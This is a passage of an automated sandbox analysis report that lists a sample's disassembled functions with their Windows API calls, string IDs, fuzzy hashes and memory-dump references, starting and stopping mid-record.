                              • Opcode Fuzzy Hash: a6ee15f86e2e931e5f907f080d7a2fe7c2280932969c786e03b0a865bc569088
                              • Instruction Fuzzy Hash: 6251AD311083459BC728EF19C891AAEB7A5FF86B14F144829F4D6D72A2DB31E909CB53
                              Function 00889997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __i64tow__itow__swprintf
                              • String ID: %.15g$0x%p$False$True
                              • API String ID: 421087845-2263619337
                              • Opcode ID: 0b1f26737761a7a24e06e1fd79a43c959917ada22c33cd0705670952a0b75e08
                              • Instruction ID: 364bae6a8260198223cf2037e73169e57b9298dd2f97ca335ccc36825ae9f356
                              • Opcode Fuzzy Hash: 0b1f26737761a7a24e06e1fd79a43c959917ada22c33cd0705670952a0b75e08
                              • Instruction Fuzzy Hash: 9141B671604209AFEB24AB38DC41F7A7BE8FB45314F24446EF689D6292EE7199418B12
                              Function 009073C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 009073D9
                              • CreateMenu.USER32 ref: 009073F4
                              • SetMenu.USER32(?,00000000), ref: 00907403
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00907490
                              • IsMenu.USER32(?), ref: 009074A6
                              • CreatePopupMenu.USER32 ref: 009074B0
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009074DD
                              • DrawMenuBar.USER32 ref: 009074E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                              • String ID: 0$F
                              • API String ID: 176399719-3044882817
                              • Opcode ID: 58e11f7a2ba224f063b762eb858d39898512b3c817d4966dc7caa4d6032d056b
                              • Instruction ID: cfab1ea6a24bf858680d32d107ef5a021679360bd78a511c537f44a31b234bb4
                              • Opcode Fuzzy Hash: 58e11f7a2ba224f063b762eb858d39898512b3c817d4966dc7caa4d6032d056b
                              • Instruction Fuzzy Hash: 3C415978A04205EFDB20DFA8D884EAABBFAFF49310F144429F955973A0D730A920DF50
                              Function 0090772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                              Download Yara Rule
                              APIs
                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009077CD
                              • CreateCompatibleDC.GDI32(00000000), ref: 009077D4
                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009077E7
                              • SelectObject.GDI32(00000000,00000000), ref: 009077EF
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 009077FA
                              • DeleteDC.GDI32(00000000), ref: 00907803
                              • GetWindowLongW.USER32(?,000000EC), ref: 0090780D
                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00907821
                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0090782D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                              • String ID: static
                              • API String ID: 2559357485-2160076837
                              • Opcode ID: 726dd2a80391d52166636e0e8967f6241e9ba0c8cfad48ac3f7eb949319a6e5d
                              • Instruction ID: 6e33beed37e3f6c9fc2b0e851fefebfc418101e15bcd436a89a76c6c6284c1b1
                              • Opcode Fuzzy Hash: 726dd2a80391d52166636e0e8967f6241e9ba0c8cfad48ac3f7eb949319a6e5d
                              • Instruction Fuzzy Hash: 9D318E32518215AFDF219FA4DC58FDA3B6DFF09364F104224FA15A60E0C731E921EBA4
                              Function 008A7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008A707B
                                • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                              • __gmtime64_s.LIBCMT ref: 008A7114
                              • __gmtime64_s.LIBCMT ref: 008A714A
                              • __gmtime64_s.LIBCMT ref: 008A7167
                              • __allrem.LIBCMT ref: 008A71BD
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A71D9
                              • __allrem.LIBCMT ref: 008A71F0
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A720E
                              • __allrem.LIBCMT ref: 008A7225
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A7243
                              • __invoke_watson.LIBCMT ref: 008A72B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                              • String ID:
                              • API String ID: 384356119-0
                              • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                              • Instruction ID: f471124ecaf99171a2550d2bda1bdce1e35846dafc02eb41860f655ebfdb28f9
                              • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                              • Instruction Fuzzy Hash: F071C771A04B16ABF7149E7DCC42BAAB3A8FF12324F14423AF515E7B81E770E9409791
                              Function 008E2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008E2A31
                              • GetMenuItemInfoW.USER32(00946890,000000FF,00000000,00000030), ref: 008E2A92
                              • SetMenuItemInfoW.USER32(00946890,00000004,00000000,00000030), ref: 008E2AC8
                              • Sleep.KERNEL32(000001F4), ref: 008E2ADA
                              • GetMenuItemCount.USER32(?), ref: 008E2B1E
                              • GetMenuItemID.USER32(?,00000000), ref: 008E2B3A
                              • GetMenuItemID.USER32(?,-00000001), ref: 008E2B64
                              • GetMenuItemID.USER32(?,?), ref: 008E2BA9
                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008E2BEF
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2C03
                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2C24
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                              • String ID:
                              • API String ID: 4176008265-0
                              • Opcode ID: 4ad48f32ac953670daaeaf602863db4332d88108d4ba705727a636d73e2c6be0
                              • Instruction ID: d5112a5ee3ea39cd1cd44699589949e5ecf925adbe846af733b3072632623b9b
                              • Opcode Fuzzy Hash: 4ad48f32ac953670daaeaf602863db4332d88108d4ba705727a636d73e2c6be0
                              • Instruction Fuzzy Hash: DA617BB0914289AFDB21CF65CC88EAE7BBCFB42314F140569E841E3251D771AE45EB21
                              Function 00907192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00907214
                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00907217
                              • GetWindowLongW.USER32(?,000000F0), ref: 0090723B
                              • _memset.LIBCMT ref: 0090724C
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0090725E
                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009072D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow_memset
                              • String ID:
                              • API String ID: 830647256-0
                              • Opcode ID: 3d7dfe658f40754c27da95923f327ce658d8723feaa815cadb94f4e05d53cf6b
                              • Instruction ID: e6b6130be04ddebd3909d8a120709c0ecb6c212a5acd6819652d23f7c0782652
                              • Opcode Fuzzy Hash: 3d7dfe658f40754c27da95923f327ce658d8723feaa815cadb94f4e05d53cf6b
                              • Instruction Fuzzy Hash: F5616BB5904208AFDB20DFA4CC81EEEB7F8EB09710F140159FA14E72E1D774A945DB60
                              Function 008D710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008D7135
                              • SafeArrayAllocData.OLEAUT32(?), ref: 008D718E
                              • VariantInit.OLEAUT32(?), ref: 008D71A0
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 008D71C0
                              • VariantCopy.OLEAUT32(?,?), ref: 008D7213
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 008D7227
                              • VariantClear.OLEAUT32(?), ref: 008D723C
                              • SafeArrayDestroyData.OLEAUT32(?), ref: 008D7249
                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D7252
                              • VariantClear.OLEAUT32(?), ref: 008D7264
                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D726F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                              • String ID:
                              • API String ID: 2706829360-0
                              • Opcode ID: 4783f0394abaace50dc6045631a93b97ef5c4f87007e5668d89877617cd2e545
                              • Instruction ID: d87fa5867b27f14c88e9e6debffdb103b8eb5a2f20a644a9b034fdb87cfb9457
                              • Opcode Fuzzy Hash: 4783f0394abaace50dc6045631a93b97ef5c4f87007e5668d89877617cd2e545
                              • Instruction Fuzzy Hash: 234163319042199FCF10DFA8D898DAEBBB9FF08354F008166F956E7361DB30AA45CB91
                              Function 008F5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                              Download Yara Rule
                              APIs
                              • WSAStartup.WSOCK32(00000101,?), ref: 008F5AA6
                              • inet_addr.WSOCK32(?,?,?), ref: 008F5AEB
                              • gethostbyname.WSOCK32(?), ref: 008F5AF7
                              • IcmpCreateFile.IPHLPAPI ref: 008F5B05
                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5B75
                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5B8B
                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008F5C00
                              • WSACleanup.WSOCK32 ref: 008F5C06
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                              • String ID: Ping
                              • API String ID: 1028309954-2246546115
                              • Opcode ID: 27f5596034f04ffa59f76a4ff6227f7e3a310a7b7863234f147da13a140fd527
                              • Instruction ID: 5dc7f4b63e8272bf8c0498806164b4b5ae6d3f04d8588239c6f1d93d4b0ed838
                              • Opcode Fuzzy Hash: 27f5596034f04ffa59f76a4ff6227f7e3a310a7b7863234f147da13a140fd527
                              • Instruction Fuzzy Hash: FE518F316047049FD720AF24CC59B3AB7E4FF48720F148929F696DB2A1DB70E9009B42
                              Function 008EB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 008EB73B
                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008EB7B1
                              • GetLastError.KERNEL32 ref: 008EB7BB
                              • SetErrorMode.KERNEL32(00000000,READY), ref: 008EB828
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Error$Mode$DiskFreeLastSpace
                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                              • API String ID: 4194297153-14809454
                              • Opcode ID: e90d2443b92a378511de3deeb49d3fbac9fe58e8ad6374ac882a3b56b2088223
                              • Instruction ID: 00a4c44529710d16c2b558d98fad583b4c5e3409b28803a022c671fb396f90fb
                              • Opcode Fuzzy Hash: e90d2443b92a378511de3deeb49d3fbac9fe58e8ad6374ac882a3b56b2088223
                              • Instruction Fuzzy Hash: 8931C435A00248AFDB10EF69CC85ABF7BB4FF8A754F144029E541D7291DB719E42CB51
                              Function 008D9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008D94F6
                              • GetDlgCtrlID.USER32 ref: 008D9501
                              • GetParent.USER32 ref: 008D951D
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D9520
                              • GetDlgCtrlID.USER32(?), ref: 008D9529
                              • GetParent.USER32(?), ref: 008D9545
                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D9548
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 1536045017-1403004172
                              • Opcode ID: 354f3dac1f7856199be001807c4fb29d1f89028286d7ea137cf41fd1f940836b
                              • Instruction ID: 6a5a75792bf2588004e7708a4034939a358a191508e9667f41ee096aa312bac7
                              • Opcode Fuzzy Hash: 354f3dac1f7856199be001807c4fb29d1f89028286d7ea137cf41fd1f940836b
                              • Instruction Fuzzy Hash: 5321B075904208AFCF05AF64CC95EFEBBB5FF49310F10022AF961972A2DB7599199B20
                              Function 008D955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008D95DF
                              • GetDlgCtrlID.USER32 ref: 008D95EA
                              • GetParent.USER32 ref: 008D9606
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D9609
                              • GetDlgCtrlID.USER32(?), ref: 008D9612
                              • GetParent.USER32(?), ref: 008D962E
                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D9631
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 1536045017-1403004172
                              • Opcode ID: 8e7fc4a2d3faf69a3611a6efc6c624c60f99676486dbabadc0868b35c9b00819
                              • Instruction ID: afdf39119a09edbed9e2562d2a1b325d52e587bdb5b364c5e797ad55fc36fccb
                              • Opcode Fuzzy Hash: 8e7fc4a2d3faf69a3611a6efc6c624c60f99676486dbabadc0868b35c9b00819
                              • Instruction Fuzzy Hash: 1721A175900208BFDF15AB64CC95EFEBBB8FF58300F100216F951D72A1DB7599199B21
                              Function 008D9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32 ref: 008D9651
                              • GetClassNameW.USER32(00000000,?,00000100), ref: 008D9666
                              • _wcscmp.LIBCMT ref: 008D9678
                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008D96F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClassMessageNameParentSend_wcscmp
                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                              • API String ID: 1704125052-3381328864
                              • Opcode ID: ff10ad032c1395c886152eb5fda9a918f69e6ef9fbf7ea0293021966480ffae1
                              • Instruction ID: c65918f3e0a9594de0809639e78f1b3661dcbf9adfeec127ed049cff0da6e6fa
                              • Opcode Fuzzy Hash: ff10ad032c1395c886152eb5fda9a918f69e6ef9fbf7ea0293021966480ffae1
                              • Instruction Fuzzy Hash: 2C113A37248307BAFA112624EC06DA6779CEB11328F200227FD00E15D1FE92E9415A49
                              Function 008F8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                              Download Yara Rule
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 008F8BEC
                              • CoInitialize.OLE32(00000000), ref: 008F8C19
                              • CoUninitialize.OLE32 ref: 008F8C23
                              • GetRunningObjectTable.OLE32(00000000,?), ref: 008F8D23
                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 008F8E50
                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00912C0C), ref: 008F8E84
                              • CoGetObject.OLE32(?,00000000,00912C0C,?), ref: 008F8EA7
                              • SetErrorMode.KERNEL32(00000000), ref: 008F8EBA
                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008F8F3A
                              • VariantClear.OLEAUT32(?), ref: 008F8F4A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                              • String ID:
                              • API String ID: 2395222682-0
                              • Opcode ID: 7c264092cb3539c2eabcb818ebd36a09a3503888d31ed707022118fc251447cc
                              • Instruction ID: b3d0c2cae04e20e4fbef0a617bf453e1b1a94d699624383e03120f0be2a84e6e
                              • Opcode Fuzzy Hash: 7c264092cb3539c2eabcb818ebd36a09a3503888d31ed707022118fc251447cc
                              • Instruction Fuzzy Hash: 75C1E071208309AFD700EF68C88496AB7E9FF89748F04495DFA8ADB251DB71ED05CB52
                              Function 008E4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                              Download Yara Rule
                              APIs
                              • __swprintf.LIBCMT ref: 008E419D
                              • __swprintf.LIBCMT ref: 008E41AA
                                • Part of subcall function 008A38D8: __woutput_l.LIBCMT ref: 008A3931
                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 008E41D4
                              • LoadResource.KERNEL32(?,00000000), ref: 008E41E0
                              • LockResource.KERNEL32(00000000), ref: 008E41ED
                              • FindResourceW.KERNEL32(?,?,00000003), ref: 008E420D
                              • LoadResource.KERNEL32(?,00000000), ref: 008E421F
                              • SizeofResource.KERNEL32(?,00000000), ref: 008E422E
                              • LockResource.KERNEL32(?), ref: 008E423A
                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 008E429B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                              • String ID:
                              • API String ID: 1433390588-0
                              • Opcode ID: b827bf46754e880cc0f87fd10026416a0c81cabe13d337f45baff60c98296ba3
                              • Instruction ID: 45a0c5cea0a4917b7c5aced80bf63654cc5ec8f479f4965402c35acce244c1d6
                              • Opcode Fuzzy Hash: b827bf46754e880cc0f87fd10026416a0c81cabe13d337f45baff60c98296ba3
                              • Instruction Fuzzy Hash: 2C31EF71A0924AAFDB109FA1DC58EBF7BACFF0A301F004425FA19D6550E730DA11EBA0
                              Function 008E16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 008E1700
                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008E0778,?,00000001), ref: 008E1714
                              • GetWindowThreadProcessId.USER32(00000000), ref: 008E171B
                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0778,?,00000001), ref: 008E172A
